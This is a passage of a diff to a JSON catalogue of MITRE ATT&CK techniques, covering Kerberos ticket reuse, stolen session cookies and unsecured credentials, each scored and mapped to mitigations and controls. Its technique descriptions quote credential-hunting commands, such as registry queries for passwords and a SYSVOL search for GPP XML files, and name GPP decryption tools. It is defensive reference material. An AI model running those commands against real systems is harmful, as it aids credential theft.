+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.25012692000000003,
-        "adjusted_score": 0.25012692000000003,
+        "cumulative_score": 0.33333333333333337,
+        "adjusted_score": 0.33333333333333337,
         "has_car": false,
         "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SI-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1550.003",
+        "name": "Use Alternate Authentication Material: Pass the Ticket",
+        "description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)",
+        "url": "https://attack.mitre.org/techniques/T1550/003",
+        "tactics": [
+            "Defense Evasion",
+            "Lateral Movement"
+        ],
+        "detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Credential Request",
+            "Logon Session: Logon Session Creation",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1550",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.30000000000000004,
+        "adjusted_score": 0.30000000000000004,
+        "has_car": false,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
         "cis_controls": [
-            "13.3",
-            "13.8"
+            "4.1",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-4",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
             "CA-7",
             "CM-2",
+            "CM-5",
             "CM-6",
-            "CM-7",
-            "SC-7",
-            "SI-3",
+            "IA-2",
+            "IA-5",
             "SI-4"
         ],
         "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.1,
-            "mitigation_score": 0.18181818181818182,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0.00012692
+        "hardware_coverage": false
     },
     {
-        "tid": "T1105",
-        "name": "Ingress Tool Transfer",
-        "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.",
-        "url": "https://attack.mitre.org/techniques/T1105",
+        "tid": "T1550.004",
+        "name": "Use Alternate Authentication Material: Web Session Cookie",
+        "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)",
+        "url": "https://attack.mitre.org/techniques/T1550/004",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion",
+            "Lateral Movement"
         ],
-        "detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Google Workspace",
+            "IaaS",
+            "Office 365",
+            "SaaS"
         ],
         "data_sources": [
-            "File: File Creation",
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Application Log: Application Log Content",
+            "Web Credential: Web Credential Usage"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1550",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             }
         ],
-        "cumulative_score": 1.5862620004761905,
-        "adjusted_score": 1.5862620004761905,
-        "has_car": true,
+        "cumulative_score": 0.2380952380952381,
+        "adjusted_score": 0.2380952380952381,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "13.3",
-            "13.8"
+            "4.1",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "CM-7",
-            "SC-7",
-            "SI-3",
-            "SI-4"
+            "SC-23",
+            "SC-8",
+            "SI-7"
         ],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.49047619047619045,
-            "mitigation_score": 0.18181818181818182,
-            "detection_score": 0.83
-        },
-        "choke_point_score": 0.4,
-        "prevalence_score": 0.69578581
+        "hardware_coverage": false
     },
     {
-        "tid": "T1106",
-        "name": "Native API",
-        "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).",
-        "url": "https://attack.mitre.org/techniques/T1106",
+        "tid": "T1552",
+        "name": "Unsecured Credentials",
+        "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).",
+        "url": "https://attack.mitre.org/techniques/T1552",
         "tactics": [
-            "Execution"
+            "Credential Access"
         ],
-        "detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ",
+        "detection": "While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\nMonitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.\n\nMonitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.\n\nAdditionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
         "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
             "Linux",
+            "Office 365",
+            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Module: Module Load",
-            "Process: OS API Execution"
+            "Command: Command Execution",
+            "File: File Access",
+            "Process: Process Creation",
+            "User Account: User Account Authentication",
+            "Windows Registry: Windows Registry Key Access"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1552.001",
+                "name": "Unsecured Credentials: Credentials In Files",
+                "url": "https://attack.mitre.org/techniques/T1552/001",
+                "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)",
+                "detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1552.002",
+                "name": "Unsecured Credentials: Credentials in Registry",
+                "url": "https://attack.mitre.org/techniques/T1552/002",
+                "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s",
+                "detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1552.003",
+                "name": "Unsecured Credentials: Bash History",
+                "url": "https://attack.mitre.org/techniques/T1552/003",
+                "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)",
+                "detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.",
+                "mitigations": [
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    }
+                ]
+            },
+            {
+                "tid": "T1552.004",
+                "name": "Unsecured Credentials: Private Keys",
+                "url": "https://attack.mitre.org/techniques/T1552/004",
+                "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.",
+                "detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1552.005",
+                "name": "Unsecured Credentials: Cloud Instance Metadata API",
+                "url": "https://attack.mitre.org/techniques/T1552/005",
+                "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n",
+                "detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            },
+            {
+                "tid": "T1552.006",
+                "name": "Unsecured Credentials: Group Policy Preferences",
+                "url": "https://attack.mitre.org/techniques/T1552/006",
+                "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\n\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: post/windows/gather/credentials/gpp\n* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml\n",
+                "detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)",
+                "mitigations": [
+                    {
+                        "mid": "M1015",
+                        "name": "Active Directory Configuration",
+                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1015"
+                    },
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1552.007",
+                "name": "Unsecured Credentials: Container API",
+                "url": "https://attack.mitre.org/techniques/T1552/007",
+                "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ",
+                "detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
+                "mitigations": [
+                    {
+                        "mid": "M1035",
+                        "name": "Limit Access to Resource Over Network",
+                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1035"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            }
+        ],
         "mitigations": [
             {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
+                "mid": "M1015",
+                "name": "Active Directory Configuration",
+                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1015"
+            },
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.952785081904762,
-        "adjusted_score": 0.952785081904762,
-        "has_car": false,
+        "cumulative_score": 1.0690183395238095,
+        "adjusted_score": 1.0690183395238095,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": false,
-        "cis_controls": [],
+        "has_splunk": true,
+        "cis_controls": [
+            "3.1",
+            "3.11",
+            "3.12",
+            "3.2",
+            "3.3",
+            "4.1",
+            "4.2",
+            "4.5",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
+            "11.3",
+            "14.3",
+            "14.4",
+            "14.9",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5",
+            "13.10"
+        ],
         "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-4",
+            "AC-5",
             "AC-6",
+            "CA-7",
+            "CA-8",
             "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
+            "IA-2",
+            "IA-3",
+            "IA-4",
+            "IA-5",
+            "RA-5",
+            "SA-11",
+            "SA-15",
+            "SC-12",
+            "SC-28",
+            "SC-4",
+            "SC-7",
+            "SI-10",
+            "SI-12",
+            "SI-15",
             "SI-2",
-            "SI-3",
-            "SI-4"
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.16190476190476188,
-            "mitigation_score": 0.14545454545454545,
+            "combined_score": 0.6095238095238096,
+            "mitigation_score": 1,
             "detection_score": 0.18
         },
-        "choke_point_score": 0.55,
-        "prevalence_score": 0.24088032
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.10949453
     },
     {
-        "tid": "T1110",
-        "name": "Brute Force",
